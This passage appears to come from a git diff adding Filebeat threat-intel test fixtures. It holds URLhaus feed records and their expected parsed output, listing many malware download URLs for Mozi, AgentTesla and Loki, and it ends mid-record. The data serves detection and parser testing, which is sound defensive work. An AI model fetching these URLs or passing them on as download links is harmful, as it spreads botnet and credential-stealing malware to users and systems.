+{"id":"960920","urlhaus_reference":"https://urlhaus.abuse.ch/url/960920/","url":"http://59.58.148.90:33799/bin.sh","url_status":"online","host":"59.58.148.90","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960918","urlhaus_reference":"https://urlhaus.abuse.ch/url/960918/","url":"http://kalamikwsdyonlinedws.dns.navy/kaladoc/vbc.exe","url_status":"online","host":"kalamikwsdyonlinedws.dns.navy","date_added":"2021-01-14 15:45:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"listed"},"reporter":"abuse_ch","larted":"true","tags":["AgentTesla","exe"]} +{"id":"960917","urlhaus_reference":"https://urlhaus.abuse.ch/url/960917/","url":"http://54.224.10.186/js/js/lokkk.jpg","url_status":"online","host":"54.224.10.186","date_added":"2021-01-14 15:45:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki"]} +{"id":"960916","urlhaus_reference":"https://urlhaus.abuse.ch/url/960916/","url":"http://59.99.141.110:33201/Mozi.a","url_status":"offline","host":"59.99.141.110","date_added":"2021-01-14 15:38:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960914","urlhaus_reference":"https://urlhaus.abuse.ch/url/960914/","url":"http://59.99.136.138:53926/Mozi.m","url_status":"offline","host":"59.99.136.138","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960915","urlhaus_reference":"https://urlhaus.abuse.ch/url/960915/","url":"http://61.245.159.55:43917/Mozi.m","url_status":"online","host":"61.245.159.55","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960911","urlhaus_reference":"https://urlhaus.abuse.ch/url/960911/","url":"http://59.99.43.122:42053/Mozi.m","url_status":"offline","host":"59.99.43.122","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960912","urlhaus_reference":"https://urlhaus.abuse.ch/url/960912/","url":"http://49.68.21.201:57875/Mozi.m","url_status":"online","host":"49.68.21.201","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960913","urlhaus_reference":"https://urlhaus.abuse.ch/url/960913/","url":"http://59.96.26.38:35523/Mozi.m","url_status":"offline","host":"59.96.26.38","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960910","urlhaus_reference":"https://urlhaus.abuse.ch/url/960910/","url":"http://42.224.66.103:47418/i","url_status":"online","host":"42.224.66.103","date_added":"2021-01-14 15:38:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960908","urlhaus_reference":"https://urlhaus.abuse.ch/url/960908/","url":"http://27.41.206.240:53007/Mozi.m","url_status":"offline","host":"27.41.206.240","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960909","urlhaus_reference":"https://urlhaus.abuse.ch/url/960909/","url":"http://42.230.133.2:38089/Mozi.m","url_status":"offline","host":"42.230.133.2","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960904","urlhaus_reference":"https://urlhaus.abuse.ch/url/960904/","url":"http://42.230.178.221:35243/Mozi.m","url_status":"online","host":"42.230.178.221","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960905","urlhaus_reference":"https://urlhaus.abuse.ch/url/960905/","url":"http://42.224.249.12:50589/Mozi.m","url_status":"online","host":"42.224.249.12","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960906","urlhaus_reference":"https://urlhaus.abuse.ch/url/960906/","url":"http://221.200.70.79:42479/Mozi.m","url_status":"online","host":"221.200.70.79","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960907","urlhaus_reference":"https://urlhaus.abuse.ch/url/960907/","url":"http://42.224.168.94:43425/Mozi.m","url_status":"online","host":"42.224.168.94","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960903","urlhaus_reference":"https://urlhaus.abuse.ch/url/960903/","url":"http://163.125.207.35:35013/Mozi.a","url_status":"online","host":"163.125.207.35","date_added":"2021-01-14 15:36:28 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960902","urlhaus_reference":"https://urlhaus.abuse.ch/url/960902/","url":"http://125.44.244.43:35298/Mozi.m","url_status":"online","host":"125.44.244.43","date_added":"2021-01-14 15:35:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960900","urlhaus_reference":"https://urlhaus.abuse.ch/url/960900/","url":"http://116.73.8.210:54174/Mozi.m","url_status":"online","host":"116.73.8.210","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960901","urlhaus_reference":"https://urlhaus.abuse.ch/url/960901/","url":"http://121.61.104.66:42768/Mozi.a","url_status":"online","host":"121.61.104.66","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960898","urlhaus_reference":"https://urlhaus.abuse.ch/url/960898/","url":"http://117.247.206.115:59110/Mozi.a","url_status":"offline","host":"117.247.206.115","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960899","urlhaus_reference":"https://urlhaus.abuse.ch/url/960899/","url":"http://119.198.43.18:51476/Mozi.m","url_status":"online","host":"119.198.43.18","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960897","urlhaus_reference":"https://urlhaus.abuse.ch/url/960897/","url":"http://182.124.94.169:58839/Mozi.m","url_status":"online","host":"182.124.94.169","date_added":"2021-01-14 15:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960894","urlhaus_reference":"https://urlhaus.abuse.ch/url/960894/","url":"http://125.46.166.16:50249/Mozi.m","url_status":"online","host":"125.46.166.16","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960895","urlhaus_reference":"https://urlhaus.abuse.ch/url/960895/","url":"http://123.4.250.147:46173/Mozi.m","url_status":"online","host":"123.4.250.147","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960896","urlhaus_reference":"https://urlhaus.abuse.ch/url/960896/","url":"http://182.124.57.87:43785/Mozi.m","url_status":"online","host":"182.124.57.87","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960893","urlhaus_reference":"https://urlhaus.abuse.ch/url/960893/","url":"http://113.92.159.37:46924/Mozi.m","url_status":"online","host":"113.92.159.37","date_added":"2021-01-14 15:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960892","urlhaus_reference":"https://urlhaus.abuse.ch/url/960892/","url":"http://113.195.165.157:59734/Mozi.m","url_status":"online","host":"113.195.165.157","date_added":"2021-01-14 15:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960889","urlhaus_reference":"https://urlhaus.abuse.ch/url/960889/","url":"http://103.84.240.178:51620/Mozi.m","url_status":"offline","host":"103.84.240.178","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960890","urlhaus_reference":"https://urlhaus.abuse.ch/url/960890/","url":"http://115.54.239.78:42585/Mozi.a","url_status":"online","host":"115.54.239.78","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960891","urlhaus_reference":"https://urlhaus.abuse.ch/url/960891/","url":"http://103.46.242.87:57941/Mozi.m","url_status":"offline","host":"103.46.242.87","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960888","urlhaus_reference":"https://urlhaus.abuse.ch/url/960888/","url":"http://115.52.17.165:38308/i","url_status":"online","host":"115.52.17.165","date_added":"2021-01-14 15:32:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960887","urlhaus_reference":"https://urlhaus.abuse.ch/url/960887/","url":"http://42.227.222.174:55281/Mozi.m","url_status":"online","host":"42.227.222.174","date_added":"2021-01-14 15:22:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960886","urlhaus_reference":"https://urlhaus.abuse.ch/url/960886/","url":"http://42.233.232.90:57662/Mozi.a","url_status":"online","host":"42.233.232.90","date_added":"2021-01-14 15:22:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960885","urlhaus_reference":"https://urlhaus.abuse.ch/url/960885/","url":"http://59.97.173.255:40738/Mozi.m","url_status":"offline","host":"59.97.173.255","date_added":"2021-01-14 15:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960884","urlhaus_reference":"https://urlhaus.abuse.ch/url/960884/","url":"http://59.99.93.5:59018/Mozi.m","url_status":"offline","host":"59.99.93.5","date_added":"2021-01-14 15:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960880","urlhaus_reference":"https://urlhaus.abuse.ch/url/960880/","url":"http://39.66.175.56:60279/Mozi.a","url_status":"online","host":"39.66.175.56","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960881","urlhaus_reference":"https://urlhaus.abuse.ch/url/960881/","url":"http://27.216.188.167:52738/Mozi.m","url_status":"online","host":"27.216.188.167","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960882","urlhaus_reference":"https://urlhaus.abuse.ch/url/960882/","url":"http://60.212.123.142:37394/Mozi.m","url_status":"online","host":"60.212.123.142","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960883","urlhaus_reference":"https://urlhaus.abuse.ch/url/960883/","url":"http://58.249.22.13:56491/Mozi.m","url_status":"online","host":"58.249.22.13","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960879","urlhaus_reference":"https://urlhaus.abuse.ch/url/960879/","url":"http://120.193.91.214:46067/Mozi.a","url_status":"online","host":"120.193.91.214","date_added":"2021-01-14 15:20:19 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} diff --git a/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log-expected.json new file mode 100644 index 000000000000..5f12181b2dbf --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log-expected.json @@ -0,0 +1,3397 @@ +[ + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961548/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 0, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "103.72.223.103", + "threatintel.indicator.first_seen": "2021-01-14T21:19:13.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "103.72.223.103", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://103.72.223.103:34613/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34613, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961546/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 359, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "112.30.97.184", + "threatintel.indicator.first_seen": "2021-01-14T21:19:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "112.30.97.184", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://112.30.97.184:44941/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 44941, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961547/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 716, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "113.110.198.53", + "threatintel.indicator.first_seen": "2021-01-14T21:19:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "113.110.198.53", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://113.110.198.53:37173/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 37173, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961545/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 1075, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "101.20.183.170", + "threatintel.indicator.first_seen": "2021-01-14T21:19:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "101.20.183.170", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://101.20.183.170:47545/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 47545, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961544/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 1434, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "59.8.35.22", + "threatintel.indicator.first_seen": "2021-01-14T21:07:07.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "59.8.35.22", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://59.8.35.22:44782/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 44782, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961543/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 1784, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "59.96.37.35", + "threatintel.indicator.first_seen": "2021-01-14T21:07:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "59.96.37.35", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://59.96.37.35:44359/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 44359, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961540/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 2136, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.239.233.17", + "threatintel.indicator.first_seen": "2021-01-14T21:07:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.239.233.17", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.239.233.17:56507/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 56507, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961541/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 2492, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "58.252.178.20", + "threatintel.indicator.first_seen": "2021-01-14T21:07:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "58.252.178.20", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://58.252.178.20:57562/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 57562, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961542/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 2848, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "45.176.111.95", + "threatintel.indicator.first_seen": "2021-01-14T21:07:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "45.176.111.95", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://45.176.111.95:48845/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 48845, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961539/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 3204, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.224.68.97", + "threatintel.indicator.first_seen": "2021-01-14T21:07:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.224.68.97", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.224.68.97:58245/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 58245, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961538/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 3558, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "222.81.144.207", + "threatintel.indicator.first_seen": "2021-01-14T21:06:08.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "222.81.144.207", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://222.81.144.207:37198/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 37198, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961537/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 3916, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.127.185.137", + "threatintel.indicator.first_seen": "2021-01-14T21:06:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.127.185.137", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://182.127.185.137:33524/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 33524, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961531/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 4276, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "39.84.175.185", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "39.84.175.185", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://39.84.175.185:48261/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 48261, + 